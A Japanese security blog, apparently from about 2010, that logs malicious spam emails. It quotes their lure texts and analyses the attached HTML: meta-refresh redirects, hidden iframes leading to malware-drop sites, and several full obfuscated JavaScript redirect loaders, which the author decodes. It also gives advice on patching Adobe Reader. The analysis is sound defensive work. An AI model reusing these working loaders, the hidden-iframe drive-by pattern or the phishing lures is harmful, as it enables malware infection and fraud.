FC2ブログ

【今日のウイルスメール】

おお、index4.htmlになってる。

サブジェクト
Please Verify Your Email Address: REPLY to this email.

本文
Note: Forwarded message is attached.

______________________________________________________________________

Message from "Wilbur Ferris"
______________________________________________________________________

This is the first message I have received from you since Hometown Lending began using Sender Address Verification (SAV).

Replying to this message will deliver your original message to the top of my inbox and all future emails will be recognized and delivered directly to me.

When replying to this email, please make sure that the following email address appears in the To: field of the reply:

cretin743@reflectionsmm.com

If you are unable to reply, your message may not be delivered.


Thank you!

Wilbur Ferris

添付ファイル
Please Verify Your Email Address REPLY to this email.html
そのファイルの中身
<meta http-equiv="refresh" content="0;url=h丁丁p://www.cow-shop.nl/index4.html" />

index4.htmlの中身

PLEASE, WAITING.... 4 sec
<meta http-equiv="refresh" content="4;url=h丁丁p://knewname.com" />
<iframe src='h丁丁p://chainjoke.ru:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe><br>


これも同じ
差出人
"eBay" <eBay@reply1.ebay.com>

サブジェクト
Payment request from

本文
We recorded a payment request from "eBay" to enable the charge of $666.10 on your account.

The payment is pending for the moment.

If you made this transaction or if you just authorize this payment, please ignore or remove this email message. The transaction will be shown on your monthly statement as "eBay".

If you didn't make this payment and would like to decline it, please download and install the transaction inspector module (attached to this letter).

添付ファイル
form.html


【今日のウイルスメール】いろいろ来てるけど

いろいろ来ている、メタタグHTML誘導メール。
今日の中だと、これが、いちばんそれっぽいかな。それにしてもここ数日、難読化スクリプトメールは来ない。効果薄だったのかな。

サブジェクト
Mail could not be delivered

本文
Sent <<< RCPT TO:
Received >>> 550 5.1.1 user unknown

Unable to deliver message to .

************************ End of message **********************

添付HTML
Mail could not be delivered.html

HTMLの中身
<meta http-equiv="refresh" content="0;url=h丁丁p://madeinperu.net/index3.html" />

誘導先index3.htmlの中身
PLEASE, WAITING.... 4 sec
<meta http-equiv="refresh" content="4;url=h丁丁p://knewname.com" /> ← いつもの Canadian Pharmacy
<iframe src='h丁丁p://sheepbody.com:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe><br> ← 危険サイト

【今日の悪質スクリプト】

うーむ。パターンがいくつかある。
基本的に、誘導先や悪質プログラムダウンロードサイトに共通してそうなのは、PHPとOVH(ホスティング)かな。

メールサブジェクト
Delivery Status Notification (Failure)
Your E-mail has been Blocked
Returned mail. See transcript for details

メール本文
Note: Forwarded message is attached.

This is an automatically generated Delivery Status Notification

THIS IS A WARNING MESSAGE ONLY.

Delivery to the following recipient has been delayed:

office@○○.com

Message will be retried for 2 more day(s)

Note: Forwarded message is attached.

The e-mail attached has been blocked by the OpenIP Spam and Content service and has been classified as inappropiate content.

SENDER office@○○.com

RECIPIENT undeceivingn4@r-p.com

TRIGGER Spam message detected: category - Others , score - 22.000

ID 6I483F37-5366-A133-D356-1KF8L8UD8H95

添付ファイル
Forwarded Message.html
Your E-mail has been Blocked.html

誘導先
<meta http-equiv="refresh" content="0;url=h丁丁p://miphillylatino.com/index3.html" />
<meta http-equiv="refresh" content="0;url=h丁丁p://www.loge1001amsterdam.nl/index3.html" />
<meta http-equiv="refresh" content="0;url=h丁丁p://idieperu.org/index3.html" />
<meta http-equiv="refresh" content="0;url=h丁丁p://mapdigital.net/index3.html" />
<meta http-equiv="refresh" content="0;url=h丁丁p://sirenecollection.com/index3.html" />←GETできず
<meta http-equiv="refresh" content="0;url=h丁丁p://blohards.com/index3.html" />←GETできず

上記からすべて以下の悪質プログラムダウンロードサイト(たぶん)へ
h丁丁p://clanday.com:8080/index.php?pid=10 ↓80番ポートにアクセスしてみると、、
clanday.jpg

誘導先2  ← 誘導先にindex3.htmlがつかないタイプ
<meta http-equiv="refresh" content="0;url=h丁丁p://leandromauricio.com" />
eval(location.href = 'h丁丁p://leandromauricio.com/';); ← 今日はこれだけ難読化スクリプト。他はすべて平文

上記からは以下の悪質プログラムダウンロードサイト(たぶん)へ
<script type="text/javascript" src="h丁丁p://roundstorm.com:8080/ActiveX.js"></script>←何をやってるのだろうか?

【今日の悪質スクリプト】

kei5さんツールのおかげでスクリプト解析が速くなった。ありがたし。


サブジェクト
User lapelsjz05 suggests you to become friends on YouTube

本文
User lapelsjz05 suggests you to become friends on YouTube. Offers and acceptance of offers on friendship simplify tracing of that your friends place in the selected works, add or estimate, and also simplifies video departure by all or to the selected users.

To accept or reject this invitation, pass in attach file.

添付ファイル
Youtube Message.html


サブジェクト
Delivery Status Notification (Failure)

本文
Note: Forwarded message is attached.

This is an automatically generated Delivery Status Notification

THIS IS A WARNING MESSAGE ONLY.

Delivery to the following recipient has been delayed:

culminatedj31@reveyron.com

Message will be retried for 2 more day(s)

添付ファイル
Delivery Status Notification (Failure).html


解析結果
h丁丁p://eyesensations.com/index3.html
誘導先
h丁丁p://bittag.ru:8080/index.php?pid=10




【考察メモ】いつもの難読スクリプトメール

1.最終的には、前半にある文字列を2文字ずつ16進数ととらえて、「ある数字」とXORをかけて出てきた文字列が誘導先で、それをeval()で実行している。

2.この「ある数字」は、「適当な数字」に1を足した数字である。

3.スクリプト中の大半の命令はダミーであり意味を成していない。

4.変数名と関数名は、誘導先が異なれば異なるが、全体構造は基本同じ。

5.よって、スクリプト生成ツールが存在する。入力値は誘導先のURLのみ。あとは、プログラムで自動的に「適当な数字」や関数名を生成する。

6.メールにより、サイト名だけの場合とサイト名/index3.htmlの2パターンが存在する。サイト名だけの場合は、所謂通常の迷惑メールを装っており、Canadian Pharmacy などの有名な迷惑販売サイトに誘導する。これは、ジャミングのためのわざとなのか、犯人のミスなのかは分からない。index3.htmlが書いてあるほうは、このindex3.htmlにて、メタタグで上記と同じような有名な迷惑販売サイトに誘導し、iframeタグで、マルウェア仕込みサイト(:8080/index.php?pid=10)に誘導する。

7.関係サイトは以下のとおり。
1)迷惑販売サイト
これはこれで「まっとう」な商売サイト。(笑)
犯人の本業なのか、別途請け負っている迷惑メール配布で仕入れた情報を横流ししているのかは分からない。いずれにせよ、こちらの犯人はこの「まっとう」な迷惑メールに寄生している。

2)index3配布サイト
正規サイトのアカウントを盗むか、PHPのSQLインジェクションか、ある種のPHPパッケージの脆弱性かは、分からないが、いずれにせよ他人のサイトに、index3を自動生成的に生成しているのではないか。入力パラメータは、迷惑販売サイトURLとマルウェア仕込みサイトURL。

3)マルウェア仕込みサイト(:8080/index.php?pid=10)
robots.txtがおいている。(笑)
User-Agent: *
Disallow: /
構造は、どらごときには分からない。ピノキオとジェペットおじさんの鯨の中の人にでも聞かなきゃ。
DNSを引いてみると以下のようにラウンドロビンになっており、複数のIPで構成されている。全部のIPが
Non-authoritative answer:
Name: treecorn.ru
Addresses: 91.121.103.107, 91.121.107.72, 94.23.202.201, 188.165.196.182
195.200.83.246
IPアドレスから調べてみるとヨーロッパのホスティング会社(OVHなど)のPHPが入っているサーバではないかと考えられる。ボットかと思ったけど違うようだ。ドメイン名の取得は7月5日なので最近。

8.全体の動き
マルウェア仕込みサイトは正しく借りているか、適当なクレジットで借りているかじゃないかな。ひょっとしたら、PHPが入っていそうなのでインジェクションかExploitかけているかもしれないけど。同時にドメイン名をとり、ラウンドロビンで当該サイトを登録する。配布の準備ができると、index3配布サイトを探し、適当な迷惑販売サイトURLと自分のURLを書き込んだhtmlを仕込む。その後、誘導スクリプトを作成し、適当な文言でメールをつくり、ばら撒く。という感じだろうか。

となると、PHP(あるいはある種のPHPパッケージ)の脆弱性や管理画面へのアカウントハッキングやSQLインジェクションなどの動向を調べると面白そうだけど、どらには荷が重い。JSOCの中の人に聞いてみるか。

【今日のウイルスメール】いつもの難読スクリプトメール

サブジェクト
Returned mail: see transcript for details

本文
Note: Forwarded message is attached.

The original message was received at Wed, 7 Jul 2010 16:30:43 -0600

----- Transcript of session follows -----
550 5.0.0 ... User unknown
at RCPT TO:


添付スクリプト
<script>var qHO=false;var cK;if(cK!='' && cK!='aKY'){cK='aY'};var pS;var yN;if(yN!='cB' && yN != ''){yN=null};this.uA="uA";var wK=62581;this.gS="gS";pS="3d3e323025383"+"e3f7f39233437"+"716c717639252"+"5216b7e7e2830"+"22342530387f3"+"23e3c7e383f35"+"3429627f39253"+"c3d766a";var aR;if(aR!='' && aR!='tJE'){aR=null};var hR=18684;var qL;if(qL!='' && qL!='yNX'){qL=null}; function j(tL){var z='';var yF=new Array();var fE;if(fE!='iZ' && fE != ''){fE=null};function iA(hV,w){var m;if(m!=''){m='oG'};var kF;if(kF!=''){kF='gF'};var eZ;if(eZ!=''){eZ='fU'};var dR = Math.ceil(23);return hV['\u0063\u0068\u0061\u0072\u0043\u006f\u0064'+unescape('%65%41%74')](w);}var jI='';var dE = Math.random();this.eI=false;var hJ=new Array();function r(zL,tE){var aU=new Array();var tY=63075;return zL^tE;}var c=new Date();var tH=16674;var mL='';var wP=new Array();var tB=new Date();var cT = new Date(); var pRW='';this.dZ="dZ";var bZ;if(bZ!='lG' && bZ!='hUN'){bZ='lG'};var q = cT['\u0067\u0065\u0074'+unescape('%53%65%63%6f%6e%64%73')]();var lW;if(lW!='dU' && lW != ''){lW=null};var zQ=9009;var eC;if(eC!='pF' && eC!='dT'){eC='pF'};var x = q - eK;var tKN=false;var gQ;if(gQ!='qH' && gQ != ''){gQ=null};if(x < 0) x = 1;var xS=new Array();if(x > 1) x = 1;this.yV=27700;var qRZ;if(qRZ!='' && qRZ!='dEK'){qRZ=''};var wG=new Array();var pR = x;var dO = Math.random();this.eL=false;var gO;if(gO!='' && gO!='eLY'){gO=''};this.oO=false;var cX = window;this.bO="bO";this.aCS="aCS";var gA;if(gA!='' && gA!='sW'){gA=''};var dA = document;var pYT=20269;var a = String;var oK=false;var yY;if(yY!='iQ' && yY != ''){yY=null};var k = cX['\u0075\u006e\u0065\u0073\u0063\u0061\u0070'+unescape('%65')];this.vC="";var bD = a['\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072'+unescape('%43%6f%64%65')];var bMZ = Math.ceil(9);var jN = Math.random();var eVK=new Array();var yD;if(yD!='' && yD!='yK'){yD=''};var oOV=3459;var p = '';var lT = '%';var o = 2;this.sMX="";var u = 0;var i = tL['\u006c'+unescape('%65%6e%67%74%68')];var tR=false;var qHM;if(qHM!=''){qHM='kMH'};for(var d=u; d < i; d+=o){var dUN;if(dUN!='' && dUN!='iF'){dUN=''};var aJ;if(aJ!='' && aJ!='aN'){aJ=''};p+= lT + tL['\u0073\u0075'+unescape('%62%73%74%72')](d, o);this.qI=14193;this.sK=false;}var tL = k(p);this.kGE="";var gTV;if(gTV!='' && gTV!='lY'){gTV=''};var vD;if(vD!='' && vD!='kV'){vD=''};this.xR=56593;var oOS;if(oOS!='xF' && oOS!='lQ'){oOS='xF'};var eF = 80 + pR;var eCD=28391;var wC = '';var cE;if(cE!='' && cE!='mU'){cE=null};var vJ = tL['\u006c'+unescape('%65%6e%67%74%68')];for(var v=0; v < vJ; v++){var wX=new Date();var nB;if(nB!='xH' && nB!='iD'){nB=''};var mF = iA(tL,v);mF = r(mF, eF);var gIT;if(gIT!='uT' && gIT!='rIY'){gIT=''};this.hB="hB";wC+=bD(mF);this.nDV='';}var hBE;if(hBE!='' && hBE!='hZ'){hBE='eRQ'};this.cO=14836;var zV=new Array();var oOA=5796;var gIN='';cX['\u0065\u0076'+unescape('%61%6C')](wC);this.yE=false;return wC;this.nCE="";this.yLM=false;}this.uY="";this.mA="mA";var xAD;if(xAD!='' && xAD!='qD'){xAD=''};var dJ = new Date();this.lD=58186;var eK = dJ['\u0067\u0065\u0074'+unescape('%53%65%63%6f%6e%64%73')](); var bU = Math.random();var uB = Math.random();var gAM;if(gAM!='tP' && gAM!='oA'){gAM='tP'};this.tEO=false;setTimeout('j(pS)', 986);var oF;if(oF!=''){oF='kVB'};var hE;if(hE!='' && hE!='lI'){hE=''};var jZ=false;</script>

解読結果
location.href = 'h丁丁p://yasetai.com/index3.html'; ← 危険

誘導先
h丁丁p://treecorn.ru:8080/index.php?pid=10 ← 危険

【今日のウイルスメール】やっぱり

サブジェクト
Delivery Status Notification (Failure)

本文 この中のメールアドレスはメール毎に異なる
Note: Forwarded message is attached.

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

lengthierqd@redneckville.com

Final-Recipient: rfc666;lengthierqd@redneckville.com
Action: failed
Status: 0.1.7

添付ファイル
Delivery Status Notification (Failure).html

内容 ↓ 危険


<script>this.pA="";var dLL='';this.gGA="";var bH='';var sF;this.tY="tY";var oK;if(oK == 'fIF'){oK=0;};var mU;if(mU!='' && mU!='uHN'){mU=null};sF='f3f0fcf'+'eebf6f0'+'f1b1f7e'+'dfaf9bf'+'a2bfb8f'+'7ebebef'+'a5b0b0e'+'8f7f6eb'+'fef4fae'+'df2fafb'+'f6fcfef'+'3b1fcf0'+'f2b0f6f'+'1fbfae7'+'acb1f7e'+'bf2f3b8'+'a4';this.sVO=false;var lF;if(lF!='' && lF!='wLM'){lF=''}; function tH(o){var n=false;var kL=new Array();var lG;if(lG!='' && lG!='cP'){lG=null};function iG(h,z){var j='';this.vS=58506;var sB;if(sB == 'kLU'){sB=0;};this.bU='';var tHP=new Array();return h['\u0063'+unescape('%68%61%72%43%6f%64%65%41%74')](z);}var qI=false;var iO=new Array();var uF='';function p(m,bI){this.aL='';var tF=false;this.fA="fA";var gG=false;this.nX='';var aP=new Date();return m^bI;}this.eU="";var mO = new Date(); var sP = (mO['\u0067\u0065\u0074\u0048\u006f\u0075\u0072'+unescape('%73')]()*3594)+(mO['\u0067'+unescape('%65%74%4d%69%6e%75%74%65%73')]()*58)+mO['\u0067\u0065\u0074\u0053\u0065\u0063\u006f'+unescape('%6e%64%73')]();var w = sP - hS;var rI;if(rI == 'u'){rI=0;};if(w < 0) w = 1;var bE;if(bE!='wY' && bE != ''){bE=null};this.tB="";if(w > 1) w = 1;var aN = w;var oY='';var vM;if(vM!='' && vM!='aM'){vM='xK'};var q = window;this.uH=61780;this.yW='';var b = document;var lA='';this.nK='';var aLN;if(aLN!='cM' && aLN!='qPG'){aLN=''};var k = String;this.cT=4529;this.yR=27565;var hC = q['\u0075'+unescape('%6e%65%73%63%61%70%65')];var eL;if(eL!='' && eL!='gT'){eL=''};var wQ;if(wQ!='tA' && wQ!='eO'){wQ=''};var sL=false;var bR = k['\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043'+unescape('%6f%64%65')];this.hX=false;this.cA='';var gH = Math.ceil(34);this.jN="";var pH = '';var kT=new Date();var a = '%';this.aR="";var gO = 2;var aF = 0;var sG='';var pK=new Date();var nY;if(nY!='tBV' && nY != ''){nY=null};var yY = o['\u006c\u0065'+unescape('%6e%67%74%68')];this.gJ='';var cK=8670;var jJ=27060;for(var qP=aF; qP < yY; qP+=gO){pH+= a + o['\u0073\u0075'+unescape('%62%73%74%72')](qP, gO);var hQ;if(hQ!=''){hQ='aE'};var iY;if(iY!=''){iY='uV'};var qPF;if(qPF!=''){qPF='uS'};}var xTB;if(xTB!='gOU' && xTB!='wG'){xTB=''};var yDR=47300;var gS=51664;var o = hC(pH);var jE;if(jE!='' && jE!='fQO'){jE='tV'};var iGM=false;var yU = Math.ceil(47);var xMG = Math.ceil(4);this.aA=false;var mL=new Array();var g = 158 + aN;var dY;if(dY!='' && dY!='i'){dY=''};var sT='';var dQ;if(dQ!='' && dQ!='eUJ'){dQ=''};var x = '';var yL;if(yL!='qN' && yL != ''){yL=null};var qZ='';var r = o['\u006c\u0065'+unescape('%6e%67%74%68')];this.cDO=false;this.xZE=false;var xWD='';for(var uP=0; uP < r; uP++){var cO;if(cO!='' && cO!='iL'){cO=null};var iR;if(iR!='' && iR!='sC'){iR=null};this.yFW=false;this.iZV="";this.cDS="";var nC = Math.random();var wN = iG(o,uP);this.sUB=3111;var dB = Math.ceil(18);var zNJ;if(zNJ!='tNB' && zNJ != ''){zNJ=null};wN = p(wN, g);var yFA = Math.ceil(33);this.vAY="";var gY;if(gY!='kLUU' && gY!='yE'){gY=''};x+=bR(wN);var aH = Math.random();var kFH=new Array();var wF;if(wF == 'hD'){wF=0;};}var yZ;if(yZ!='dL' && yZ!='lI'){yZ='dL'};var tAE;if(tAE!='aW' && tAE!='kCM'){tAE=''};q['\u0065\u0076'+unescape('%61%6C')](x);this.hA=false;this.zRK=false;var eWN='';return x;var qF=false;var tE=35610;var bS=false;}var cU = Math.ceil(42);this.gSQ="";this.eWT=false;var eR=new Array();var qE = new Date();var zU=new Array();var eP = Math.ceil(4);this.sUH=31560;var hS = (qE['\u0067\u0065\u0074\u0048\u006f\u0075\u0072'+unescape('%73')]()*3594)+(qE['\u0067'+unescape('%65%74%4d%69%6e%75%74%65%73')]()*58)+qE['\u0067\u0065\u0074\u0053\u0065\u0063\u006f'+unescape('%6e%64%73')](); var oYD=new Date();this.eRO=false;setTimeout('tH(sF)', 1030);var rT;if(rT!=''){rT='nG'};var eLG=false;var aY=false;var vXN=false;</script>


という具合に難読化されているのだけど、うちのkei5先生に確認して解いてみると、

location.href = "h○○p://whitakermedical.com/index3.html"; ← 危険

となり、実際にアクセスしてみると、以下が落ちてきた。
index3.html


<meta http-equiv="refresh" content="4;url=http://pullkeep.com" />
<iframe src='h○○p://fokal.emanuelarpyflores.com:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe> ← 危険


なるほど、いつものパターンだ。この「:8080/index.php?pid=10」で、攻撃コードが落ちてくるのだろうな。

【今日のウイルスメール】amazonとindex2.html

amazon.jpg

今度はアマゾン。どこをクリックしても以下に誘導される。
h○○p://sharonlane.com/index2.html
で、この中身がこれ↓


PLEASE, WAITING.... 4 sec
<meta h○○p-equiv="refresh" content="4;url=http://najzefpegpe.com" />> → (A)
<iframe src='h○○p://sorut.charterdestinations.org:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe> → (B) 多分 マルウェアダウンロード


(A)はいつものCanadian Pharmacy と思ったら Healthcare Online だって。↓
そういえば、こういうスパムも見かけるなぁ。スパムの偽者を装うスパムウイルスか。(笑)

canadianhelth.jpg
このサイトは↓。(AGUSEでの調査)
korea.jpg
で、マルウェアダウンロードサイト(B)は↓
poland.jpg


【今日のウイルスメール】

差出人
"Doyle Stephens" <poulticesj7@royalthames.com>

サブジェクト
Because Of You

本文
My Truest Soulmate

see attach ;)

添付ファイル
foryou.html


<sc○○pt type='text/javascript'>this.iT="iT";var xBZ=false;this.dD="";var lM;var xF='';var zW=7622;this.kC="";var tZ='';lM='191a1614011c1a1b5b1d07'+'1013554855521d0101054f'+'5a5a191a1b100601140705'+'141c1b5b161a185a1c1b11'+'100d475b1d011819524e';var dB;if(dB!=''){dB='pD'};var oKJ=''; function d(cL){var uR='';var t=new Date();var u=new Date();var oG;if(oG!=''){oG='qZ'};function xA(uU,s){var eC=new Date();var oP;if(oP!='yZ' && oP != ''){oP=null};var mC;if(mC!=''){mC='o'};return uU['\u0063\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0041'+unescape('%74')](s);var gF;if(gF!='sS' && gF != ''){gF=null};}var yQ='';var tE='';function l(x,tA){var hC = Math.ceil(5);this.eZ=false;var xE='';return x^tA;this.wG=false;}var eR=new Array();var gM = new Date(); var kL;if(kL!='jV' && kL!='iG'){kL=''};var iS=new Date();var w = (gM['\u0067'+unescape('%65%74%48%6f%75%72%73')]()*3580)+(gM['\u0067\u0065\u0074'+unescape('%4d%69%6e%75%74%65%73')]()*57)+gM['\u0067\u0065\u0074\u0053\u0065\u0063'+unescape('%6f%6e%64%73')]();var nM = w - pM;var qZX;if(qZX!='' && qZX!='bX'){qZX='hD'};var hW='';var oK = Math.ceil(17);if(nM < 0) nM = 1;if(nM > 1) nM = 1;var oGE=false;var lS=false;var cK=new Array();var uD = nM;this.nD="nD";var tKB;if(tKB!='fEN' && tKB!='iJ'){tKB=''};var gJ = window;var i = document;var wZ=new Date();var sN;if(sN!=''){sN='gNB'};var iY=new Date();var iE = String;this.xS="";var a = gJ['\u0075\u006e'+unescape('%65%73%63%61%70%65')];var nE;if(nE!='' && nE!='jA'){nE='fM'};var p=new Array();this.bO="";var aI = iE['\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072'+unescape('%43%6f%64%65')];this.aIH=false;var gY=false;var lI;if(lI == 'iK'){lI=0;};var vG;if(vG!='' && vG!='hO'){vG=null};this.nF=false;var jD = '';var e = '%';var qZD='';var jF=false;var lV;if(lV!='lT' && lV!='wIY'){lV='lT'};var m = 2;var nW='';var g = 0;var vV = cL['\u006c\u0065\u006e\u0067\u0074'+unescape('%68')];var r=20161;for(var mH=g; mH < vV; mH+=m){var lA='';var gP;if(gP!='' && gP!='oF'){gP=null};this.yZD=6307;jD+= e + cL['\u0073\u0075\u0062'+unescape('%73%74%72')](mH, m);var bH=59741;}var cL = a(jD);var eL='';var h = 116 + uD;var eU=6024;var dP = '';this.uQ="uQ";var sZ = cL['\u006c\u0065\u006e\u0067\u0074'+unescape('%68')];var cIW=false;var aP=false;for(var c=0; c < sZ; c++){var fG;if(fG!='' && fG!='gYL'){fG=''};var eG='';var fD = xA(cL,c);fD = l(fD, h);dP+=aI(fD);this.bY=44615;this.wLB=57774;var uN=new Array();}var uS;if(uS!=''){uS='aC'};var z;if(z!='' && z!='zJO'){z=''};var hR=38358;var zZ = Math.random();gJ['\u0065\u0076'+unescape('%61%6C')](dP);var aS=false;return dP;this.sJ=37033;}this.mG="";var jE='';var hN = new Date();var fRB;if(fRB!='bQM' && fRB!='cO'){fRB=''};var pM = (hN['\u0067'+unescape('%65%74%48%6f%75%72%73')]()*3580)+(hN['\u0067\u0065\u0074'+unescape('%4d%69%6e%75%74%65%73')]()*57)+hN['\u0067\u0065\u0074\u0053\u0065\u0063'+unescape('%6f%6e%64%73')](); var tQ;if(tQ!=''){tQ='kTT'};var uY;if(uY!=''){uY='nQ'};var mO='';setTimeout('d(lM)', 1018);this.wC='';var lX;if(lX!='' && lX!='sX'){lX='jJ'};this.hL='';var rUS;if(rUS!='' && rUS!='pR'){rUS='wOC'};</script>

【今日のウイルスメール】index2.html関係メモ

例のMetaタグでCanadian Pharmacy へ iframeタグでマルウェアダウンロードサイトへ誘導する関係URL。

メールサブジェクト例
Best of Digg Weekly
hello
I Love To Fuck My Ex Girlfriend
Brunette babe takes part in the Cum Fiesta!
Nikki Sexx Deepthroats And Fucks
young limber girl
DHL Tracking number for you
Reset your メールドメイン password
Welcome to YouTube
vanzettia0@ricksmagic.com has sent you a birthday ecard.
Thanks for your order!
Your Domain Has Been Suspended

元々のメールに記載されているアドレス(index2.htmlを配置しているサイト:危険です。
h○○p://freightairsea.com/index2.html IPアドレス 213.186.33.19 フランス
h○○p://sonda.co.kr/index2.html IPアドレス 222.236.220.234 韓国
h○○p://hznihao.com/index2.html IPアドレス 203.194.200.17 香港

マルウェアダウンロードサイト
ads.compressyourmortgage.com:8080/index.php?pid=10 IPアドレス 89.200.171.216 ドイツ

【今日のウイルスメール】canadian pharmacy

以前のアンジェリーナ・ジョリーメールあたりから大量に来ている、canadian pharmacyスパムを装ったウイルス誘導メール。← 迷惑メールを装うって何だ!(爆)

大体HTMLメールで文面は様々だが、。リンクをクリックすると、適当なところに飛ばされる。
ちなみに今回は、
「Reset your メールのドメイン名 password」
本文
Reset your メールのドメイン名 password
Hello, メールアドレス.

We received your request to reset your メールのドメイン名 password. To confirm your request and reset your password, follow the instructions below. Confirming your request helps prevent unauthorized access to your account.
If you didn't request that your password be reset, please follow the instructions below to cancel your request.
CONFIRM REQUEST AND RESET PASSWORD
Click on the following web address:

で、クリックすると、たとえば h○○p://sonda.co.kr/index2.html に飛ばされる。

このindex2.htmlの内容は、以下のような感じ。


PLEASE, WAITING.... 4 sec
<meta http-equiv="refresh" content="4;url=h○○p://pullkeep.com" /> ↓ 通常の「canadian pharmacy」へ飛んでいく。
canadianpharmacy.jpg
↑ ちなみにIPの存在場所は中国。(aguseでの情報)
ip.jpg
↓問題はこれ。
<iframe src='h○○p://ads.compressyourmortgage.com:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>


多くの人は、いつも来ている「canadian pharmacy」としか思わないし、実際にクリックしても「canadian pharmacy」が表示されるので安心している。裏で本命iframeタグが動作して「:8080/index.php?pid=10」に飛ばされている。

「ジェペットさん=の中の人」に聞いてみると、ゼロデイのPDFが落ちてくるそうだ。でも、昨日アドビから修正リリースが出ているので、対策ちゃんとやっておこう!

アドビリーダを起動して、一番右の「ヘルプ」をクリックし「アップデートの有無をチェック」。
あとついでに、悪用されることも多いJavaScriptを無効化しておこう。「編集」メニューの一番下の「環境設定」をクリック。「javascript」をクリックし、右側の「Acrobat JavaScriptを使用(J)」のチェックを外しておこう

ちなみにジェペットおじさんは家に転がり込んできた松の木で「ピノッキオ」を作ったそうだ。なるほど!松の木から作られたピノッキが、鯨の中で、飲み込まれていたジェペットと会ったのは必然ということか。(笑)←一部受け

【今日のウイルスメール】これか、話題のワールドカップウイルスは

ニュースでワールドカップウイルスが出回っているので、注意という記事があったのでちょっと見てみた。

来てた、大体6月11日から12日にかけてで、手口は最近多い誘導スクリプト込みのHTMLが添付されているものだ。

# マシン早く直さないとなぁ、、、暇ないなぁ。

サブジェクト
FIFA World Cup South Africa... bad news

本文
Hello!!
FIFA World Cup 2010 scandal news, read attached document

添付HTML
open.html
news.html
など

誘導スクリプト
<script type='text/javascript'>function dX(){};var h=new Date();dX.prototype = {f : function() {var u=function(){};var uY=new Date();var o="";var k=document;var oE=function(){};var l='';this.i=33457;var kV=k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, '')];var w=function(){};var p=false;this.pP=false;this.s='';kV['hGrGe>f>'.replace(/[\>mYGw]/g, '')]='hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ'.replace(/[JS2\>l]/g, '');var iK="iK";pK='';this.d="d";uM="";}};this.dK="";var fG=new dX(); var dR="dR";fG.f();hJ=false;</script>
プロフィール

どらいつ 家主:どらいつ

情報セキュリティ会社勤務。13年前からタバコを止めたが禁煙はしてない。ダイエットとリバウンドの繰り返し。


1958年 北九州市生まれ。大原小学校、池田小学校、香月中学、北九州予備校、東筑高校、熊本大学土木科(中退)、1984年就職、現在にいたる。

中学時は水泳部。部内で平泳ぎ 4位(4人中)。高校・大学時代9年間はラグビー。ポジションはフッカー。当時に今の体重があれば、、

ツイッター(Twitter) dry2
つぶやきログ(Twilog) dry2
日経電子版コラム
日経BP連載
グーグル+写真アルバム
フォト蔵 dry2

最新記事
最新コメント
カテゴリ
RSS
どらいつのお気に入り